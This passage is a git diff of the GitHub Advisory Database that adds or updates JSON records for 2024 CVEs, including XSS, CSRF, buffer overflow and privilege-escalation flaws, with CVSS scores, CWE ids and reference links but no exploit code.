"severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N" + } ], "affected": [ @@ -35,7 +38,7 @@ "cwe_ids": [ ], - "severity": null, + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2024-01-23T01:15:10Z" diff --git a/advisories/unreviewed/2024/01/GHSA-x9cm-jx7h-mxw7/GHSA-x9cm-jx7h-mxw7.json b/advisories/unreviewed/2024/01/GHSA-x9cm-jx7h-mxw7/GHSA-x9cm-jx7h-mxw7.json new file mode 100644 index 0000000000000..75727ed7d703d --- /dev/null +++ b/advisories/unreviewed/2024/01/GHSA-x9cm-jx7h-mxw7/GHSA-x9cm-jx7h-mxw7.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-x9cm-jx7h-mxw7", + "modified": "2024-01-31T18:31:26Z", + "published": "2024-01-31T18:31:26Z", + "aliases": [ + "CVE-2024-22306" + ], + "details": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Hometory Mang Board WP allows Stored XSS.This issue affects Mang Board WP: from n/a through 1.7.7.\n\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:L" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-22306" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/vulnerability/mangboard/wordpress-mang-board-wp-plugin-1-7-7-cross-site-scripting-xss-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-01-31T17:15:35Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/01/GHSA-xc7v-9m4q-8q68/GHSA-xc7v-9m4q-8q68.json b/advisories/unreviewed/2024/01/GHSA-xc7v-9m4q-8q68/GHSA-xc7v-9m4q-8q68.json index a805aac9c307b..c4c75f641541e 100644 --- a/advisories/unreviewed/2024/01/GHSA-xc7v-9m4q-8q68/GHSA-xc7v-9m4q-8q68.json +++ b/advisories/unreviewed/2024/01/GHSA-xc7v-9m4q-8q68/GHSA-xc7v-9m4q-8q68.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-xc7v-9m4q-8q68", - "modified": "2024-01-24T18:31:01Z", + "modified": "2024-01-30T21:30:29Z", "published": "2024-01-24T18:31:01Z", "aliases": [ "CVE-2024-22720" ], "details": "Kanboard 1.2.34 is vulnerable to Html Injection in the group management feature.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N" + } ], "affected": [ @@ -25,9 +28,9 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-79" ], - "severity": null, + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2024-01-24T18:15:08Z" diff --git a/advisories/unreviewed/2024/01/GHSA-xcjc-c88c-v52w/GHSA-xcjc-c88c-v52w.json b/advisories/unreviewed/2024/01/GHSA-xcjc-c88c-v52w/GHSA-xcjc-c88c-v52w.json index 33df53220b031..5962d3f241241 100644 --- a/advisories/unreviewed/2024/01/GHSA-xcjc-c88c-v52w/GHSA-xcjc-c88c-v52w.json +++ b/advisories/unreviewed/2024/01/GHSA-xcjc-c88c-v52w/GHSA-xcjc-c88c-v52w.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-xcjc-c88c-v52w", - "modified": "2024-01-22T15:30:23Z", + "modified": "2024-01-29T18:31:47Z", "published": "2024-01-22T15:30:23Z", "aliases": [ "CVE-2020-36772" ], "details": "CloudLinux\n CageFS 7.0.8-2 or below insufficiently restricts file paths supplied to\n the sendmail proxy command. This allows local users to read and write \narbitrary files outside the CageFS environment in a limited way.\n", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N" + } ], "affected": [ @@ -33,9 +36,10 @@ ], "database_specific": { "cwe_ids": [ + "CWE-610", "CWE-73" ], - "severity": null, + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2024-01-22T15:15:07Z" diff --git a/advisories/unreviewed/2024/01/GHSA-xf98-9fph-7hjg/GHSA-xf98-9fph-7hjg.json b/advisories/unreviewed/2024/01/GHSA-xf98-9fph-7hjg/GHSA-xf98-9fph-7hjg.json new file mode 100644 index 0000000000000..d9c51cfb4f8c2 --- /dev/null +++ b/advisories/unreviewed/2024/01/GHSA-xf98-9fph-7hjg/GHSA-xf98-9fph-7hjg.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-xf98-9fph-7hjg", + "modified": "2024-02-03T00:31:33Z", + "published": "2024-01-30T09:30:33Z", + "aliases": [ + "CVE-2024-22643" + ], + "details": "A Cross-Site Request Forgery (CSRF) vulnerability in SEO Panel version 4.10.0 allows remote attackers to perform unauthorized user password resets.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-22643" + }, + { + "type": "WEB", + "url": "https://github.com/cassis-sec/CVE/tree/main/2024/CVE-2024-22643" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-352" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-01-30T07:15:07Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/01/GHSA-xgfc-fhgr-xpj4/GHSA-xgfc-fhgr-xpj4.json b/advisories/unreviewed/2024/01/GHSA-xgfc-fhgr-xpj4/GHSA-xgfc-fhgr-xpj4.json index 058b8b3540c74..7253f037771f4 100644 --- a/advisories/unreviewed/2024/01/GHSA-xgfc-fhgr-xpj4/GHSA-xgfc-fhgr-xpj4.json +++ b/advisories/unreviewed/2024/01/GHSA-xgfc-fhgr-xpj4/GHSA-xgfc-fhgr-xpj4.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-xgfc-fhgr-xpj4", - "modified": "2024-01-26T15:30:32Z", + "modified": "2024-02-01T21:30:30Z", "published": "2024-01-26T15:30:32Z", "aliases": [ "CVE-2024-22551" ], "details": "WhatACart v2.0.7 was discovered to contain a reflected cross-site scripting (XSS) vulnerability via the component /site/default/search.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" + } ], "affected": [ @@ -25,9 +28,9 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-79" ], - "severity": null, + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2024-01-26T15:15:09Z" diff --git a/advisories/unreviewed/2024/01/GHSA-xh95-48w4-456m/GHSA-xh95-48w4-456m.json b/advisories/unreviewed/2024/01/GHSA-xh95-48w4-456m/GHSA-xh95-48w4-456m.json new file mode 100644 index 0000000000000..442ef3039e2d0 --- /dev/null +++ b/advisories/unreviewed/2024/01/GHSA-xh95-48w4-456m/GHSA-xh95-48w4-456m.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-xh95-48w4-456m", + "modified": "2024-02-03T00:31:34Z", + "published": "2024-01-31T15:30:19Z", + "aliases": [ + "CVE-2024-0589" + ], + "details": "Cross-site scripting (XSS) vulnerability in the entry overview tab in Devolutions Remote Desktop Manager 2023.3.36 and earlier on Windows allows an attacker with access to a data source to inject a malicious script via a specially crafted input in an entry.\n\n\n\n\n\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-0589" + }, + { + "type": "WEB", + "url": "https://devolutions.net/security/advisories/DEVO-2024-0001/" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-01-31T13:15:10Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/01/GHSA-xm3m-3r5x-p3p6/GHSA-xm3m-3r5x-p3p6.json b/advisories/unreviewed/2024/01/GHSA-xm3m-3r5x-p3p6/GHSA-xm3m-3r5x-p3p6.json index c10052f8bea99..0b7559b4c88c7 100644 --- a/advisories/unreviewed/2024/01/GHSA-xm3m-3r5x-p3p6/GHSA-xm3m-3r5x-p3p6.json +++ b/advisories/unreviewed/2024/01/GHSA-xm3m-3r5x-p3p6/GHSA-xm3m-3r5x-p3p6.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-xm3m-3r5x-p3p6", - "modified": "2024-01-23T12:30:30Z", + "modified": "2024-01-30T00:30:29Z", "published": "2024-01-23T12:30:30Z", "aliases": [ "CVE-2024-0703" @@ -32,7 +32,7 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-79" ], "severity": "MODERATE", "github_reviewed": false, diff --git a/advisories/unreviewed/2024/01/GHSA-xpxv-cx25-38p3/GHSA-xpxv-cx25-38p3.json b/advisories/unreviewed/2024/01/GHSA-xpxv-cx25-38p3/GHSA-xpxv-cx25-38p3.json new file mode 100644 index 0000000000000..58fb658ee1b96 --- /dev/null +++ b/advisories/unreviewed/2024/01/GHSA-xpxv-cx25-38p3/GHSA-xpxv-cx25-38p3.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-xpxv-cx25-38p3", + "modified": "2024-02-08T18:30:38Z", + "published": "2024-01-31T00:30:17Z", + "aliases": [ + "CVE-2023-51204" + ], + "details": "Insecure deserialization in ROS2 Foxy Fitzroy ROS_VERSION=2 and ROS_PYTHON_VERSION=3 allows attackers to execute arbitrary code via a crafted input.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-51204" + }, + { + "type": "WEB", + "url": "https://github.com/16yashpatel/CVE-2023-51204" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-502" + ], + "severity": "CRITICAL", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-01-30T22:15:52Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/01/GHSA-xq4v-69gf-r78f/GHSA-xq4v-69gf-r78f.json b/advisories/unreviewed/2024/01/GHSA-xq4v-69gf-r78f/GHSA-xq4v-69gf-r78f.json new file mode 100644 index 0000000000000..56ed826570cde --- /dev/null +++ b/advisories/unreviewed/2024/01/GHSA-xq4v-69gf-r78f/GHSA-xq4v-69gf-r78f.json @@ -0,0 +1,42 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-xq4v-69gf-r78f", + "modified": "2024-01-31T18:31:25Z", + "published": "2024-01-31T18:31:25Z", + "aliases": [ + "CVE-2024-0832" + ], + "details": "In Telerik Reporting versions prior to 2024 R1, a privilege elevation vulnerability has been identified in the applications installer component.  In an environment where an existing Telerik Reporting install is present, a lower privileged user has the ability to manipulate the installation package to elevate their privileges on the underlying operating system.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-0832" + }, + { + "type": "WEB", + "url": "https://docs.telerik.com/reporting/knowledge-base/legacy-installer-vulnerability" + }, + { + "type": "WEB", + "url": "https://www.telerik.com/products/reporting.aspx" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-269" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-01-31T16:15:46Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/01/GHSA-xqff-gxc3-2x4v/GHSA-xqff-gxc3-2x4v.json b/advisories/unreviewed/2024/01/GHSA-xqff-gxc3-2x4v/GHSA-xqff-gxc3-2x4v.json new file mode 100644 index 0000000000000..96c7ac10860e3 --- /dev/null +++ b/advisories/unreviewed/2024/01/GHSA-xqff-gxc3-2x4v/GHSA-xqff-gxc3-2x4v.json @@ -0,0 +1,42 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-xqff-gxc3-2x4v", + "modified": "2024-02-03T00:31:33Z", + "published": "2024-01-29T15:30:29Z", + "aliases": [ + "CVE-2023-6530" + ], + "details": "The TJ Shortcodes WordPress plugin through 0.1.3 does not validate and escape some of its shortcode attributes before outputting them back in a page/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-6530" + }, + { + "type": "WEB", + "url": "https://research.cleantalk.org/cve-2023-6530-tj-shortcodes-stored-xss-poc/" + }, + { + "type": "WEB", + "url": "https://wpscan.com/vulnerability/8e63bf7c-7827-4c4d-b0e3-66354b218bee/" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-01-29T15:15:09Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/01/GHSA-xr44-2pv4-gw8r/GHSA-xr44-2pv4-gw8r.json b/advisories/unreviewed/2024/01/GHSA-xr44-2pv4-gw8r/GHSA-xr44-2pv4-gw8r.json index 57da513e30237..142698165e614 100644 --- a/advisories/unreviewed/2024/01/GHSA-xr44-2pv4-gw8r/GHSA-xr44-2pv4-gw8r.json +++ b/advisories/unreviewed/2024/01/GHSA-xr44-2pv4-gw8r/GHSA-xr44-2pv4-gw8r.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-xr44-2pv4-gw8r", - "modified": "2024-01-25T09:30:21Z", + "modified": "2024-01-31T21:31:03Z", "published": "2024-01-25T09:30:21Z", "aliases": [ "CVE-2023-33760" ], "details": "SpliceCom Maximiser Soft PBX v1.5 and before was discovered to utilize a default SSL certificate. This issue can allow attackers to eavesdrop on communications via a man-in-the-middle attack.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:N/A:N" + } ], "affected": [ @@ -25,9 +28,9 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-295" ], - "severity": null, + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2024-01-25T08:15:08Z" diff --git a/advisories/unreviewed/2024/01/GHSA-xr6f-9r29-5gq3/GHSA-xr6f-9r29-5gq3.json b/advisories/unreviewed/2024/01/GHSA-xr6f-9r29-5gq3/GHSA-xr6f-9r29-5gq3.json index b0b48b72e312b..b8325baf96597 100644 --- a/advisories/unreviewed/2024/01/GHSA-xr6f-9r29-5gq3/GHSA-xr6f-9r29-5gq3.json +++ b/advisories/unreviewed/2024/01/GHSA-xr6f-9r29-5gq3/GHSA-xr6f-9r29-5gq3.json @@ -28,7 +28,7 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-77" ], "severity": "HIGH", "github_reviewed": false, diff --git a/advisories/unreviewed/2024/01/GHSA-xvhp-2844-v475/GHSA-xvhp-2844-v475.json b/advisories/unreviewed/2024/01/GHSA-xvhp-2844-v475/GHSA-xvhp-2844-v475.json index a9cad0b338145..6059212ca99dd 100644 --- a/advisories/unreviewed/2024/01/GHSA-xvhp-2844-v475/GHSA-xvhp-2844-v475.json +++ b/advisories/unreviewed/2024/01/GHSA-xvhp-2844-v475/GHSA-xvhp-2844-v475.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-xvhp-2844-v475", - "modified": "2024-01-26T09:30:23Z", + "modified": "2024-01-30T00:30:29Z", "published": "2024-01-26T09:30:23Z", "aliases": [ "CVE-2023-48133" ], "details": "An issue in angel coffee mini-app on Line v13.6.1 allows attackers to send crafted malicious notifications via leakage of the channel access token.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N" + } ], "affected": [ @@ -27,7 +30,7 @@ "cwe_ids": [ ], - "severity": null, + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2024-01-26T07:15:58Z" diff --git a/advisories/unreviewed/2024/01/GHSA-xvjx-j3q9-j35p/GHSA-xvjx-j3q9-j35p.json b/advisories/unreviewed/2024/01/GHSA-xvjx-j3q9-j35p/GHSA-xvjx-j3q9-j35p.json index b4787627da200..f508b01096984 100644 --- a/advisories/unreviewed/2024/01/GHSA-xvjx-j3q9-j35p/GHSA-xvjx-j3q9-j35p.json +++ b/advisories/unreviewed/2024/01/GHSA-xvjx-j3q9-j35p/GHSA-xvjx-j3q9-j35p.json @@ -21,6 +21,10 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-20969" }, + { + "type": "WEB", + "url": "https://security.netapp.com/advisory/ntap-20240201-0003/" + }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpujan2024.html" diff --git a/advisories/unreviewed/2024/01/GHSA-xw3v-x6gq-q358/GHSA-xw3v-x6gq-q358.json b/advisories/unreviewed/2024/01/GHSA-xw3v-x6gq-q358/GHSA-xw3v-x6gq-q358.json index 7c1d8ef98079a..e6648ce959c8a 100644 --- a/advisories/unreviewed/2024/01/GHSA-xw3v-x6gq-q358/GHSA-xw3v-x6gq-q358.json +++ b/advisories/unreviewed/2024/01/GHSA-xw3v-x6gq-q358/GHSA-xw3v-x6gq-q358.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-xw3v-x6gq-q358", - "modified": "2024-01-23T21:30:20Z", + "modified": "2024-01-29T18:31:48Z", "published": "2024-01-23T21:30:20Z", "aliases": [ "CVE-2023-41178" ], "details": "Reflected cross-site scripting (XSS) vulnerabilities in Trend Micro Mobile Security (Enterprise) could allow an exploit against an authenticated victim that visits a malicious link provided by an attacker.\n\nPlease note, this vulnerability is similar to, but not identical to, CVE-2023-41176.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" + } ], "affected": [ @@ -29,9 +32,9 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-79" ], - "severity": null, + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2024-01-23T21:15:08Z" diff --git a/advisories/unreviewed/2024/01/GHSA-xw8g-vjxc-xg4v/GHSA-xw8g-vjxc-xg4v.json b/advisories/unreviewed/2024/01/GHSA-xw8g-vjxc-xg4v/GHSA-xw8g-vjxc-xg4v.json new file mode 100644 index 0000000000000..2e4acaabff615 --- /dev/null +++ b/advisories/unreviewed/2024/01/GHSA-xw8g-vjxc-xg4v/GHSA-xw8g-vjxc-xg4v.json @@ -0,0 +1,46 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-xw8g-vjxc-xg4v", + "modified": "2024-01-29T15:30:28Z", + "published": "2024-01-29T15:30:28Z", + "aliases": [ + "CVE-2024-0999" + ], + "details": "A vulnerability was found in Totolink N200RE 9.3.5u.6139_B20201216. It has been declared as critical. This vulnerability affects the function setParentalRules of the file /cgi-bin/cstecgi.cgi. The manipulation of the argument eTime leads to stack-based buffer overflow. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-252268. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-0999" + }, + { + "type": "WEB", + "url": "https://jylsec.notion.site/TOTOLINK-N200RE-has-stack-buffer-overflow-vulnerability-in-setParentalRules-f891c062b86349a596ee173cb456b4f6?pvs=4" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.252268" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.252268" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-121" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-01-29T13:15:08Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/01/GHSA-xwf3-49mf-8pq7/GHSA-xwf3-49mf-8pq7.json b/advisories/unreviewed/2024/01/GHSA-xwf3-49mf-8pq7/GHSA-xwf3-49mf-8pq7.json new file mode 100644 index 0000000000000..8f69a40805b00 --- /dev/null +++ b/advisories/unreviewed/2024/01/GHSA-xwf3-49mf-8pq7/GHSA-xwf3-49mf-8pq7.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-xwf3-49mf-8pq7", + "modified": "2024-01-31T15:30:20Z", + "published": "2024-01-31T15:30:20Z", + "aliases": [ + "CVE-2024-22291" + ], + "details": "Cross-Site Request Forgery (CSRF) vulnerability in Marco Milesi Browser Theme Color.This issue affects Browser Theme Color: from n/a through 1.3.\n\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-22291" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/vulnerability/browser-theme-color/wordpress-browser-theme-color-plugin-1-3-cross-site-request-forgery-csrf-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-352" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-01-31T13:15:11Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/01/GHSA-xx65-34vr-mqrj/GHSA-xx65-34vr-mqrj.json b/advisories/unreviewed/2024/01/GHSA-xx65-34vr-mqrj/GHSA-xx65-34vr-mqrj.json index 51aad6dc782fe..1cd5d2a344ee8 100644 --- a/advisories/unreviewed/2024/01/GHSA-xx65-34vr-mqrj/GHSA-xx65-34vr-mqrj.json +++ b/advisories/unreviewed/2024/01/GHSA-xx65-34vr-mqrj/GHSA-xx65-34vr-mqrj.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-xx65-34vr-mqrj", - "modified": "2024-01-26T09:30:23Z", + "modified": "2024-02-05T15:30:23Z", "published": "2024-01-26T09:30:23Z", "aliases": [ "CVE-2024-23388" ], "details": "Improper authorization in handler for custom URL scheme issue in \"Mercari\" App for Android prior to version 5.78.0 allows a remote attacker to lead a user to access an arbitrary website via the vulnerable App. As a result, the user may become a victim of a phishing attack.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" + } ], "affected": [ @@ -25,9 +28,9 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-862" ], - "severity": null, + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2024-01-26T07:15:59Z" diff --git a/advisories/unreviewed/2024/01/GHSA-xx9p-c4jq-4cff/GHSA-xx9p-c4jq-4cff.json b/advisories/unreviewed/2024/01/GHSA-xx9p-c4jq-4cff/GHSA-xx9p-c4jq-4cff.json index faa79124da6d2..611b0c18e0013 100644 --- a/advisories/unreviewed/2024/01/GHSA-xx9p-c4jq-4cff/GHSA-xx9p-c4jq-4cff.json +++ b/advisories/unreviewed/2024/01/GHSA-xx9p-c4jq-4cff/GHSA-xx9p-c4jq-4cff.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-xx9p-c4jq-4cff", - "modified": "2024-01-23T21:30:21Z", + "modified": "2024-01-31T15:30:19Z", "published": "2024-01-23T21:30:21Z", "aliases": [ "CVE-2023-52337" ], "details": "An improper access control vulnerability in Trend Micro Deep Security 20.0 and Trend Micro Cloud One - Endpoint and Workload Security Agent could allow a local attacker to escalate privileges on affected installations.\n\nPlease note: an attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + } ], "affected": [ @@ -31,7 +34,7 @@ "cwe_ids": [ ], - "severity": null, + "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2024-01-23T21:15:09Z" diff --git a/advisories/unreviewed/2024/02/GHSA-23h8-ggh4-vmhv/GHSA-23h8-ggh4-vmhv.json b/advisories/unreviewed/2024/02/GHSA-23h8-ggh4-vmhv/GHSA-23h8-ggh4-vmhv.json new file mode 100644 index 0000000000000..c0540ac46aff7 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-23h8-ggh4-vmhv/GHSA-23h8-ggh4-vmhv.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-23h8-ggh4-vmhv", + "modified": "2024-02-06T21:30:26Z", + "published": "2024-02-06T21:30:26Z", + "aliases": [ + "CVE-2024-22240" + ], + "details": "Aria Operations for Networks contains a local file read vulnerability. A malicious actor with admin privileges may exploit this vulnerability leading to unauthorized access to sensitive information. ", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-22240" + }, + { + "type": "WEB", + "url": "https://www.vmware.com/security/advisories/VMSA-2024-0002.html" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-06T20:16:03Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-23v9-73rv-qxqj/GHSA-23v9-73rv-qxqj.json b/advisories/unreviewed/2024/02/GHSA-23v9-73rv-qxqj/GHSA-23v9-73rv-qxqj.json new file mode 100644 index 0000000000000..0553a2d053f75 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-23v9-73rv-qxqj/GHSA-23v9-73rv-qxqj.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-23v9-73rv-qxqj", + "modified": "2024-02-02T18:30:32Z", + "published": "2024-02-02T18:30:32Z", + "aliases": [ + "CVE-2023-45037" + ], + "details": "A buffer copy without checking size of input vulnerability has been reported to affect several QNAP operating system versions. If exploited, the vulnerability could allow authenticated administrators to execute code via a network.\n\nWe have already fixed the vulnerability in the following versions:\nQTS 5.1.3.2578 build 20231110 and later\nQuTS hero h5.1.3.2578 build 20231110 and later\nQuTScloud c5.1.5.2651 and later\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:L/A:L" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-45037" + }, + { + "type": "WEB", + "url": "https://www.qnap.com/en/security-advisory/qsa-23-46" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-120" + ], + "severity": "LOW", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-02T16:15:51Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-24rh-qhmv-p8j2/GHSA-24rh-qhmv-p8j2.json b/advisories/unreviewed/2024/02/GHSA-24rh-qhmv-p8j2/GHSA-24rh-qhmv-p8j2.json new file mode 100644 index 0000000000000..336838ea10543 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-24rh-qhmv-p8j2/GHSA-24rh-qhmv-p8j2.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-24rh-qhmv-p8j2", + "modified": "2024-02-02T15:30:28Z", + "published": "2024-02-02T15:30:28Z", + "aliases": [ + "CVE-2024-0253" + ], + "details": "ManageEngine ADAudit Plus versions 7270 and below are vulnerable to the Authenticated SQL injection in home Graph-Data.\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:L" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-0253" + }, + { + "type": "WEB", + "url": "https://www.manageengine.com/products/active-directory-audit/sqlfix-7271.html" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-02T13:15:09Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-259r-2fr5-87c3/GHSA-259r-2fr5-87c3.json 